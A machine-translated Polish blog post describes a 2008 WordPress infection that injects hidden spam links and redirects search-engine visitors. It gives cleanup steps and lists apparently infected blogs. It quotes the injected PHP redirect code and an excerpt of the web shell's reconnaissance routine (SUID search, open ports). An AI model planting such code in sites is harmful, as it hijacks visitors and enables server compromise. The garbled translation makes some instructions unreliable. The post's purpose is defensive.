Blogosfera wirusowa… ale co ze mną masz ?!

Update
0

W ciągu ostatniego miesiąca, Dostałem ostrzeżenia Wirus w blogu od niektórych użytkowników. Początkowo zignorował ostrzeżenia, bo zainstalowany całkiem dobry program antywirusowy (Kaspersky AV 2009), A nawet blog na długi czas, nigdy nie otrzymał zawiadomienie wirusa (dawno temu .. Widziałem coś podejrzewać, że pierwszy refresh zniknął. Wreszcie ...).
Powoli zaczął wykazywać duże różnice Ruch gościemPo którym zmniejszyła się ostatnio stale ruch i zaczęło być coraz więcej osób mówi mi, że stealthsettings.com jest virused. Wczoraj otrzymałem od kogoś screenshot zrobić, gdy program antywirusowy zablokowany scenariusz z stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. To było dość przekonujące do mnie, więc mogę umieścić wszystkie źródła przeszukane. Pierwszym pomysłem, który przyszedł mi do głowy, było zrobić uaktualnienie ostatni WordPress (2.5.1), ale nie przed usunięciem wszystkich plików w starym skrypcie WordPress i zrobić backup danych. Ta procedura nie zadziałała i prawdopodobnie zajęło mi dużo czasu, zanim zrozumiałem, gdzie jest błąd, jeśli mi nie powiedział. Eugen w dyskusji przy kawie, znalazł łącze Google i to byłby dobry do niego.
MyDigitalLife.info opublikował artykuł zatytułowany: „WordPress Hack: Odzyskaj i napraw Google i wyszukiwarkę lub brak ruchu związanego z plikami cookie przekierowywanym do Your-Needs.info, AnyResults.Net, Golden-Info.net i innych nielegalnych witryn"To jest koniec tulei i potrzebne.
Chodzi o wykorzystać de WordPress na podstawie plików cookiesI myślę, że jest bardzo złożony i wykonany książkę. Na tyle sprytny, aby SQL Injection Blog Database, utworzyć niewidoczny użytkownika prosta kontrola rutynowa Panel Użytkownika->użytkownicy, sprawdzić katalogów serwera i plików "zapisywalny" (To chmod 777), szukać i do wykonać pliki z uprawnieniami grupy lub korzenia. Nie wiem, którzy wykorzystują nazwę i widzę, że jest kilka artykułów napisanych o nim, mimo że wiele blogów zakażonych, w tym Rumunii. Ok ... postaram się to wyjaśnić ogólniki na temat wirusa.

Co to jest wirus?

Najpierw włóż źródła strony na blogach, linki niewidoczne dla odwiedzających, ale widoczne i wiertła dla wyszukiwarek, zwłaszcza Google. W ten sposób Page Rank strony transferu wskazany przez atakującego. Po drugie, wstawiany jest inny kod przekierowania URL dla turystów pochodzących z Google, Live, Yahoo, ... lub czytnik RSS, a nie strona w ciastko, antywirusowe wykrywa jako przekierowanie Trojan-Clicker.HTML.

Objawy:

Zmniejszona ogromny ruch zwiedzającychZwłaszcza na blogach, gdzie większość turystów pochodzi z Google.

Identyfikacja: (w tym miejscu problem się komplikuje dla tych, którzy nie wiedzą zbyt wiele o phpmyadmin, php i linux)

LA. UWAGA! Najpierw zrób kopię zapasową bazy danych!

1. Sprawdź pliki źródłowe index.php, header.php, footer.php, Tematem bloga i zobaczyć czy jest kod, który używa szyfrowania base64 lub zawiera „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”w postaci:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Albo coś. Usuń ten kod!

Kliknij na zdjęcie ...

Indeks kod

Na powyższym zrzucie ekranu przypadkowo wybrałem i „ ”. Ten kod musi pozostać.

2. Używać phpMyAdmin i przejść do tabeli bazy danych wp_usersGdzie sprawdzić, czy nie ma nazwy użytkownika utworzone na 00:00:00 0000-00-00 (Możliwe w polu user_login pisać "WordPress”. Zapisz identyfikator tego użytkownika (pole ID), a następnie go usuń.

Kliknij na zdjęcie ...

bot

* Zielona linia należy usunąć i zachował swoje ID. W przypadku sennyCzy ID = 8 .

3. Przejdź do tabeli wp_usermeta, Gdzie usytuowany i wycierać linie do id (gdzie pole user_id Wartość ID jest usuwany).

4. W tabeli wp_optionIdź active_plugins i zobaczyć, co plugin jest włączony podejrzanego. Może być stosowany jak zakończeń _old.giff, _old.pngg, _old.jpeg, _new.php.giffitp. kombinacje bogatych rozszerzeń graficznych z _stare i _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Usuń tę wtyczkę, a następnie przejdź do bloga -> Dashboard -> Plugins, gdzie dezaktywujesz i aktywujesz dowolną wtyczkę.

Kliknij na zdjęcie, aby zobaczyć wydaje plik wirusa active_plugins.

wtyczka

Idź ścieżką na FTP lub SSH, wskazanym w active_plugins i usunąć plik z serwera.

5. Również w phpMyAdmin, w tabeli wp_option, Znajdź i usunąć wiersz zawierający "rss_f541b3abd05e7962fcab37737f40fad8'I'internal_links_cache ".
W internal_links_cache, oferowane zaszyfrowane linki spamowe, które pojawiają się na blogu kod z Google Adskark, Haker.

6. Zaleca się, aby zmień swoje hasło Blog i login usunąć wszystkie podejrzane userele. Uaktualnij do najnowszej wersji WordPress i ustaw blog tak, aby przestał rejestrować nowych użytkowników. Nie ma straty… mogą też komentować niezamieszkane.

Powyżej postarałem się trochę wyjaśnić, co zrobić w takiej sytuacji, aby wyczyścić blog z tego wirusa. Problem jest znacznie poważniejszy niż się wydaje i nie jest prawie rozwiązany, ponieważ są używane luk w zabezpieczeniach hosting serwera WWW, co jest blog.

Pierwszym środkiem bezpieczeństwa, z dostępem SSH, Make niektóre testy na serwerze, aby zobaczyć, czy są pliki takie jak * _old * i * _new. * Z zakończeń.giff,. jpeg,. pngg,. jpgg. Te pliki muszą zostać usunięte. Jeśli zmienić nazwę pliku, na przykład. top_right_old.giff in top_right_old.phpWidzimy, że plik jest dokładnie serwer kod exploita.

Kilka przydatnych instrukcji dotyczących sprawdzania, czyszczenia i zabezpieczania serwera. (przez SSH)

1.  cd / tmp i sprawdzić, czy są foldery, takie jak tmpVFlma lub inne asemenatoare kombinacji nazwy i go usunąć. Zobacz zrzut ekranu poniżej, dwa takie foldery do mnie:

tmpserver

rm-rf nazwa_folderu

2. Sprawdź i wyeliminuj (zmień chmod-ul) w miarę możliwości foldery z atrybutami chmod 777

znajdź wszystkie zapisywalne pliki w bieżącym katalogu: Znajdź. -Type f-perm-2-ls
znaleźć wszystkie katalogi zapisywalne prądu reż: Znajdź. -Type d-perm-2-ls
znajdź wszystkie zapisywalne katalogi i pliki w bieżącym katalogu: Znajdź. -Perm-2-ls

3. Szukasz podejrzanych plików na serwerze.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, UWAGA! pliki, które zostały ustawione trochę SUID si SGID. Pliki te wykonuje z przywilejami użytkownika (grupy) lub korzenia, a nie użytkownika, który wykonuje plik. Pliki te mogą doprowadzić do kompromisu, root, jeśli kwestie bezpieczeństwa. Jeśli nie używasz SUID i SGID plików z bitem, wykonaj "chmod 0 " je lub odinstalować pakiet je zawierające.

Exploit zawiera gdzieś w źródle ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Stwierdzi, że sposób ... zasadniczo naruszenia bezpieczeństwa. Porty otworzyć katalog "zapisywalny" i grupa plików przywileje egzekucyjne / root.

Powrót z więcej ...

Niektóre blogi zainfekowane: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motocykl.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindblog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... Lista jest długa ... dużo.

Możesz sprawdzić, czy blog został zainfekowany za pomocą wyszukiwarki Google. kopiuj wklej:

Site: buy www.blegoo.com

Dobrej nocy i dobrej roboty;) Myślę, że niedługo Eugen przyjdzie z wiadomościami na prevezibil.imprevizibil.com.

brb :)

UWAGA! Zmiana motywu WordPress lub uaktualnij do WordPress 2.5.1 NIE jest rozwiązaniem na pozbycie się tego wirusa.

Pasjonat technologii, z przyjemnością piszę dalej StealthSettings.com od 2006 roku. Mam duże doświadczenie w systemach operacyjnych: macOS, Windows şi Linux, ale także w językach programowania i platformach blogowych (WordPress) oraz dla sklepów internetowych (WooCommerce, Magento, PrestaShop).

Poradniki napisane przeze mnie.
Antywirus i bezpieczeństwo Internet Surfing netto godny uwagi Tech Aktualności Poradniki i aktualności IT Ulepszenia i hacki WordPress
wirus iframe Page Rank wykorzystać Security server wirus spam SQL injection Trojan zatrzaskowe wirus wordpress WordPress Wykorzystać
jak » godny uwagi » Blogosfera wirusowa… ale co ze mną masz ?!

Windows Scenarzysta na żywo / WordPress - Nieprawidłowa odpowiedź serwera (XMLRPC)

Jak dowiedzieć się z Google, czy blog WordPress czy to wirus

Zostaw komentarz

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows Vista

Windows XP

Task Manager

How To

Microsoft 365 / Office

Microsoft 365 / Office

przewyższać

Word

PowerPoint

Outlook

Office 365 Productivity

Linux & Web Software

nginx

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

web Hosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

malware

Spyware

© 2024 Stealth Settings. Poradniki i aktualności IT.

Polityka prywatności | O plikach cookie | Kontakt | O nas